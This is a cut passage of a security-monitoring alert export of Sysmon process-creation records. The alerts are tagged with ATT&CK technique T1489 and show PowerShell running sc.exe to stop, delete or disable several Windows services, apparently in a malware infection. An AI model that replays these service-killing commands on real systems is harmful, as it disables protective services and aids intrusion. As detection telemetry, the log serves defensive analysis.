+ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\sc.exe\"" Config SRDSL Start= Disabled",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:49:35.166549500Z"",""eventRecordID"":""2137"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:49:35.164\r\nProcessGuid: {df9fc3d3-b35f-5ecf-0000-0010297b1900}\r\nProcessId: 5560\r\nImage: C:\\Windows\\System32\\sc.exe\r\nFileVersion: 10.0.18362.1 (WinBuild.160101.0800)\r\nDescription: Service Control Manager Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: sc.exe\r\nCommandLine: \""C:\\Windows\\system32\\sc.exe\"" Config SRDSL Start= Disabled\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 
12:49:35.164"",""processGuid"":""{df9fc3d3-b35f-5ecf-0000-0010297b1900}"",""processId"":""5560"",""image"":""C:\\\\Windows\\\\System32\\\\sc.exe"",""fileVersion"":""10.0.18362.1 (WinBuild.160101.0800)"",""description"":""Service Control Manager Configuration Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""sc.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\sc.exe\\\"" Config SRDSL Start= Disabled"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:18:03.603",8,"ATT&CK T1489: Stop Windows Service","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:49:35.140 +ProcessGuid: {df9fc3d3-b35f-5ecf-0000-001095791900} +ProcessId: 5044 +Image: C:\Windows\System32\sc.exe +FileVersion: 10.0.18362.1 (WinBuild.160101.0800) +Description: Service Control Manager Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: sc.exe +CommandLine: ""C:\Windows\system32\sc.exe"" Stop MpeSvc +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: 
MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\sc.exe\"" Stop MpeSvc",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:49:35.142933900Z"",""eventRecordID"":""2135"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:49:35.140\r\nProcessGuid: {df9fc3d3-b35f-5ecf-0000-001095791900}\r\nProcessId: 5044\r\nImage: C:\\Windows\\System32\\sc.exe\r\nFileVersion: 10.0.18362.1 (WinBuild.160101.0800)\r\nDescription: Service Control Manager Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: sc.exe\r\nCommandLine: \""C:\\Windows\\system32\\sc.exe\"" Stop MpeSvc\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: 
C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 12:49:35.140"",""processGuid"":""{df9fc3d3-b35f-5ecf-0000-001095791900}"",""processId"":""5044"",""image"":""C:\\\\Windows\\\\System32\\\\sc.exe"",""fileVersion"":""10.0.18362.1 (WinBuild.160101.0800)"",""description"":""Service Control Manager Configuration Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""sc.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\sc.exe\\\"" Stop MpeSvc"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:18:03.557",8,"ATT&CK T1489: Stop Windows Service","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:49:35.103 +ProcessGuid: {df9fc3d3-b35f-5ecf-0000-00103b771900} +ProcessId: 3932 +Image: C:\Windows\System32\sc.exe +FileVersion: 10.0.18362.1 (WinBuild.160101.0800) +Description: Service Control Manager Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: sc.exe +CommandLine: ""C:\Windows\system32\sc.exe"" Stop IPSECS +CurrentDirectory: C:\Users\John 
Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\sc.exe\"" Stop IPSECS",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:49:35.105520700Z"",""eventRecordID"":""2132"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:49:35.103\r\nProcessGuid: {df9fc3d3-b35f-5ecf-0000-00103b771900}\r\nProcessId: 3932\r\nImage: C:\\Windows\\System32\\sc.exe\r\nFileVersion: 10.0.18362.1 (WinBuild.160101.0800)\r\nDescription: Service Control Manager Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: sc.exe\r\nCommandLine: \""C:\\Windows\\system32\\sc.exe\"" Stop IPSECS\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: 
MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 12:49:35.103"",""processGuid"":""{df9fc3d3-b35f-5ecf-0000-00103b771900}"",""processId"":""3932"",""image"":""C:\\\\Windows\\\\System32\\\\sc.exe"",""fileVersion"":""10.0.18362.1 (WinBuild.160101.0800)"",""description"":""Service Control Manager Configuration Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""sc.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\sc.exe\\\"" Stop IPSECS"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:18:03.509",8,"ATT&CK: Quick Execution of a Series of Suspicious Commands","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:49:35.084 +ProcessGuid: {df9fc3d3-b35f-5ecf-0000-0010ad751900} +ProcessId: 4052 +Image: C:\Windows\System32\sc.exe +FileVersion: 
10.0.18362.1 (WinBuild.160101.0800) +Description: Service Control Manager Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: sc.exe +CommandLine: ""C:\Windows\system32\sc.exe"" Delete 360rTys +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\sc.exe\"" Delete 360rTys",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:49:35.085815500Z"",""eventRecordID"":""2130"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:49:35.084\r\nProcessGuid: {df9fc3d3-b35f-5ecf-0000-0010ad751900}\r\nProcessId: 4052\r\nImage: C:\\Windows\\System32\\sc.exe\r\nFileVersion: 10.0.18362.1 (WinBuild.160101.0800)\r\nDescription: Service Control Manager Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: sc.exe\r\nCommandLine: \""C:\\Windows\\system32\\sc.exe\"" Delete 360rTys\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: 
DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 12:49:35.084"",""processGuid"":""{df9fc3d3-b35f-5ecf-0000-0010ad751900}"",""processId"":""4052"",""image"":""C:\\\\Windows\\\\System32\\\\sc.exe"",""fileVersion"":""10.0.18362.1 (WinBuild.160101.0800)"",""description"":""Service Control Manager Configuration Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""sc.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\sc.exe\\\"" Delete 360rTys"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:18:03.494",8,"ATT&CK T1489: Stop Windows Service","""Process Create: +RuleName: +UtcTime: 2020-05-28 
12:49:35.074 +ProcessGuid: {df9fc3d3-b35f-5ecf-0000-0010e5741900} +ProcessId: 3408 +Image: C:\Windows\System32\sc.exe +FileVersion: 10.0.18362.1 (WinBuild.160101.0800) +Description: Service Control Manager Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: sc.exe +CommandLine: ""C:\Windows\system32\sc.exe"" Stop 360rTys +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\sc.exe\"" Stop 360rTys",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:49:35.076352600Z"",""eventRecordID"":""2129"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:49:35.074\r\nProcessGuid: {df9fc3d3-b35f-5ecf-0000-0010e5741900}\r\nProcessId: 3408\r\nImage: C:\\Windows\\System32\\sc.exe\r\nFileVersion: 10.0.18362.1 (WinBuild.160101.0800)\r\nDescription: Service Control Manager Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: 
sc.exe\r\nCommandLine: \""C:\\Windows\\system32\\sc.exe\"" Stop 360rTys\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 12:49:35.074"",""processGuid"":""{df9fc3d3-b35f-5ecf-0000-0010e5741900}"",""processId"":""3408"",""image"":""C:\\\\Windows\\\\System32\\\\sc.exe"",""fileVersion"":""10.0.18362.1 (WinBuild.160101.0800)"",""description"":""Service Control Manager Configuration Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""sc.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\sc.exe\\\"" Stop 360rTys"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo 
-NoProfile""}}}", +"May 29, 2020 @ 14:18:03.431",8,"ATT&CK T1489: Stop Windows Service","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:49:35.043 +ProcessGuid: {df9fc3d3-b35f-5ecf-0000-00108c721900} +ProcessId: 4508 +Image: C:\Windows\System32\sc.exe +FileVersion: 10.0.18362.1 (WinBuild.160101.0800) +Description: Service Control Manager Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: sc.exe +CommandLine: ""C:\Windows\system32\sc.exe"" Stop Xtfyxxx +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\sc.exe\"" Stop Xtfyxxx",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:49:35.045267900Z"",""eventRecordID"":""2126"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:49:35.043\r\nProcessGuid: {df9fc3d3-b35f-5ecf-0000-00108c721900}\r\nProcessId: 4508\r\nImage: C:\\Windows\\System32\\sc.exe\r\nFileVersion: 10.0.18362.1 (WinBuild.160101.0800)\r\nDescription: Service Control Manager 
Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: sc.exe\r\nCommandLine: \""C:\\Windows\\system32\\sc.exe\"" Stop Xtfyxxx\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 12:49:35.043"",""processGuid"":""{df9fc3d3-b35f-5ecf-0000-00108c721900}"",""processId"":""4508"",""image"":""C:\\\\Windows\\\\System32\\\\sc.exe"",""fileVersion"":""10.0.18362.1 (WinBuild.160101.0800)"",""description"":""Service Control Manager Configuration Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""sc.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\sc.exe\\\"" Stop Xtfyxxx"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John 
Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:18:03.384",8,"ATT&CK T1489: Stop Windows Service","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:49:35.012 +ProcessGuid: {df9fc3d3-b35f-5ecf-0000-00102e701900} +ProcessId: 6228 +Image: C:\Windows\System32\sc.exe +FileVersion: 10.0.18362.1 (WinBuild.160101.0800) +Description: Service Control Manager Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: sc.exe +CommandLine: ""C:\Windows\system32\sc.exe"" Stop Xtfya +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\sc.exe\"" Stop 
Xtfya",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:49:35.014260800Z"",""eventRecordID"":""2123"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:49:35.012\r\nProcessGuid: {df9fc3d3-b35f-5ecf-0000-00102e701900}\r\nProcessId: 6228\r\nImage: C:\\Windows\\System32\\sc.exe\r\nFileVersion: 10.0.18362.1 (WinBuild.160101.0800)\r\nDescription: Service Control Manager Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: sc.exe\r\nCommandLine: 